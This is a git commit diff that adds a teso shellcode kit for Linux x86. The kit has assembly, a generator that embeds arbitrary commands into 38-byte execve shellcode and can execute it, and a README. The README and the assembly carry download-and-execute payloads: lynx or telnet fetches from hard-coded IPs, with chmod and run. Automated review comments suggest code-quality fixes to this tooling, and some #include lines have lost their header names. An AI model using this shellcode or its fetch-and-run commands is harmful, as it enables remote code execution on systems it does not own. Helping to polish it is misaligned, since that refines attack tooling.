From 5d3573ef7a109ee70416fe94db098fe6a769a798 Mon Sep 17 00:00:00 2001
From: SkyperTHC
Date: Tue, 3 Mar 2026 06:28:55 +0000
Subject: packetstorm sync
---
 other/shell/README | 38 ++++++++++++++
 other/shell/sc.s | 51 +++++++++++++++++++
 other/shell/shellcode.c | 46 +++++++++++++++++
 other/shell/shellxp | Bin 0 -> 90748 bytes
 other/shell/shellxp.c | 130 ++++++++++++++++++++++++++++++++++++++++++++++++
 5 files changed, 265 insertions(+)
 create mode 100644 other/shell/README
 create mode 100644 other/shell/sc.s
 create mode 100644 other/shell/shellcode.c
 create mode 100755 other/shell/shellxp
 create mode 100644 other/shell/shellxp.c
(limited to 'other/shell')
diff --git a/other/shell/README b/other/shell/README
new file mode 100644
index 0000000..b6fbeaa
--- /dev/null
+++ b/other/shell/README
@@ -0,0 +1,38 @@
+
+gcc -o shellxp shellxp.c
+
+./shellxp commands ...
+
+or to exec the generated shellcode
+
+./shellxp exec commands ...
+
+
+either rip the sc_build routine into your exploits to directly create the
+shellcode on the fly, or prepare it.
+
+some examples:
+
+./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a"
+./shellxp /bin/sh -c "echo haha > /tmp/owned"
+./shellxp /sbin/shutdown -h now
+
+or especially fancy ;-)
+
+./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh"
+
+ (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file)
+ modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-)
+
+(imagine some other fancy stuff in here :-)
+...
+
+-scut/teso.
+
+
+to modify the shellcode, use:
+
+gcc -o shellcode shellcode.c sc.s
+./shellcode <-- will dump the code
+./shellcode foo <-- will dump and run the code
+
diff --git a/other/shell/sc.s b/other/shell/sc.s
new file mode 100644
index 0000000..6133b3e
--- /dev/null
+++ b/other/shell/sc.s
@@ -0,0 +1,51 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+
+.data
+.globl cbegin
+.globl cend
+
+cbegin:
+
+ jmp jahead
+
+docall:
+ pop %edi
+
+ movl %edi, %esp
+ not %sp /* build new stack frame */
+
+ xorl %eax, %eax /* read number of arguments */
+ movb (%edi), %al
+ inc %edi
+
+decl1: push %edi
+decl2: scasb /* search delim bytes */
+ jnz decl2
+
+ movb %ah, -1(%edi)
+ dec %eax
+ jnz decl1
+
+ pop %ebx /* pathname */
+ push %ebx
+
+ push %eax
+ pop %edx /* esp -= 4, edx = &envp[] = NULL */
+ movl %esp, %ecx /* ecx = &argv[] */
+
+ movb $11, %al
+ int $0x80
+
+jahead: call docall
+
+/* reverse order arguments */
+.byte 0x03 /* number of arguments */
+.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte 0x03
+.ascii "-c"
+.byte 0x02
+.ascii "/bin/sh"
+.byte 0x01
+
+cend:
+
diff --git a/other/shell/shellcode.c b/other/shell/shellcode.c
new file mode 100644
index 0000000..1fc68cf
--- /dev/null
+++ b/other/shell/shellcode.c
@@ -0,0 +1,46 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+
+
+#include
+#include
+
+extern void cbegin ();
+extern void cend ();
+
+
+int
+main (int argc, char *argv[])
+{
+ int i;
+ unsigned char * buf = (unsigned char *) cbegin;
+ unsigned char ex_buf[1024];
+
+
+ printf ("/* %d byte shellcode */\n", cend - cbegin);
+ printf ("\"");
+ for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+
+ printf ("\\x%02x", *buf & 0xff);
+
+ if (++i >= 12) {
+ i = 0;
+ printf ("\"\n\"");
+ }
+ }
+ printf ("\";\n");
+
+ printf("\n");
+
+ if (argc > 1) {
+ printf ("%02x\n", ((unsigned char *) cbegin)[0]);
+ printf ("%02x\n", ex_buf[0]);
+ memcpy (ex_buf, cbegin, cend - cbegin);
+ printf ("%02x\n", ex_buf[0]);
+ ((void (*)()) &ex_buf)();
+ }
+
+ exit (EXIT_SUCCESS);
+}
+
diff --git a/other/shell/shellxp b/other/shell/shellxp
new file mode 100755
index 0000000..c52acb2
Binary files /dev/null and b/other/shell/shellxp differ
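Review bot: In the `argc > 1` branch of shellcode.c's main, the second `printf` reads `ex_buf[0]` before anything has been stored in `ex_buf`, so it prints an indeterminate value (undefined behavior); drop that line or declare the array as `unsigned char ex_buf[1024] = {0};`. The `memcpy` two lines later is unbounded — nothing compares the copied size with `sizeof ex_buf` — so guard it with `if ((size_t)(cend - cbegin) > sizeof ex_buf) exit (EXIT_FAILURE);`. `cend - cbegin` also subtracts two function pointers, which standard C does not define (it relies on a compiler extension), and the result is printed with `%d`, which does not match a pointer difference; at minimum cast it, `(int)(cend - cbegin)`, where it is printed. The `#include` lines appear with their header names missing, which looks like an extraction artifact rather than the original source.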
diff --git a/other/shell/shellxp.c b/other/shell/shellxp.c
new file mode 100644
index 0000000..4d5916b
--- /dev/null
+++ b/other/shell/shellxp.c
@@ -0,0 +1,130 @@
+
+#include
+#include
+#include
+#include
+#include
+
+
+/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
+ */
+unsigned char shellcode[] =
+ "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
+ "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
+ "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
+ "\xff\xff";
+
+static int sc_build (unsigned char *target, size_t target_len,
+ unsigned char *shellcode, char **argv);
+
+void hexdump (unsigned char *cbegin, unsigned char *cend);
+
+
+static int
+sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
+ char **argv)
+{
+ int i;
+ size_t tl_orig = target_len;
+
+
+ if (strlen (shellcode) >= (target_len - 1))
+ return (-1);
+
+ memcpy (target, shellcode, strlen (shellcode));
+ target += strlen (shellcode);
+ target_len -= strlen (shellcode);
+
+ for (i = 0 ; argv[i] != NULL ; ++i)
+ ;
+
+ /* set argument count
+ */
+ target[0] = (unsigned char) i;
+ target++;
+ target_len--;
+
+ for ( ; i > 0 ; ) {
+ i -= 1;
+
+ if (strlen (argv[i]) >= target_len)
+ return (-1);
+
+ printf ("[%3d/%3d] adding (%2d): %s\n",
+ (tl_orig - target_len), tl_orig,
+ strlen (argv[i]), argv[i]);
+
+ memcpy (target, argv[i], strlen (argv[i]));
+ target += strlen (argv[i]);
+ target_len -= strlen (argv[i]);
+
+ target[0] = (unsigned char) (i + 1);
+ target++;
+ target_len -= 1;
+ }
+
+ return (tl_orig - target_len);
+}
+
+
+void
+hexdump (unsigned char *cbegin, unsigned char *cend)
+{
+ int i;
+ unsigned char * buf = cbegin;
+
+
+ printf ("/* %d byte shellcode */\n", cend - cbegin);
+ printf ("\"");
+
+ for (i = 0 ; buf < cend; ++buf) {
+
+ printf ("\\x%02x", *buf & 0xff);
+
+ if (++i >= 12) {
+ i = 0;
+ printf ("\"\n\"");
+ }
+ }
+ printf ("\";\n\n");
+}
+
+
+int
+main (int argc, char *argv[])
+{
+ int n;
+ unsigned char tbuf[2048];
+ void (* tbuf_f)(void) = (void *) tbuf;
+
+
+ printf ("build exploit shellcode\n");
+ printf ("-scut / teso.\n\n");
+
+ if (argc < 2) {
+ printf ("usage: %s 
[exec] commands ...\n\n",
+ argv[0]);
+
+ exit (EXIT_FAILURE);
+ }
+
+ printf ("constructing shellcode...\n\n");
+ memset (tbuf, '\x00', sizeof (tbuf));
+ if (strcmp (argv[1], "exec") == 0)
+ n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
+ else
+ n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
+ if (n == -1) {
+ printf ("failed to build it.\n");
+ exit (EXIT_FAILURE);
+ }
+
+ printf ("shellcode size: %d bytes\n\n", n);
+ hexdump (tbuf, tbuf + n);
+
+ if (strcmp (argv[1], "exec") == 0)
+ tbuf_f ();
+
+ exit (EXIT_SUCCESS);
+}
+
-- cgit v1.3
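Review bot: The progress `printf` inside sc_build's argument loop passes `size_t` values (`tl_orig - target_len`, `tl_orig`, `strlen (argv[i])`) to `%3d`/`%2d`, which is undefined behavior and misprints on LP64 targets; use `printf ("[%3zu/%3zu] adding (%2zu): %s\n", tl_orig - target_len, tl_orig, strlen (argv[i]), argv[i]);`. `hexdump` has the same mismatch, printing the pointer difference `cend - cbegin` with `%d`; use `%td` or cast the value to `int`. `sc_build` also calls `strlen` on its `unsigned char *shellcode` parameter, a pointer-type mismatch the compiler will warn about, and that length convention silently depends on the byte array containing no 0x00 — worth stating on the parameter with a comment such as `/* NUL-terminated; length is taken with strlen() */` or switching the parameter to `const char *`.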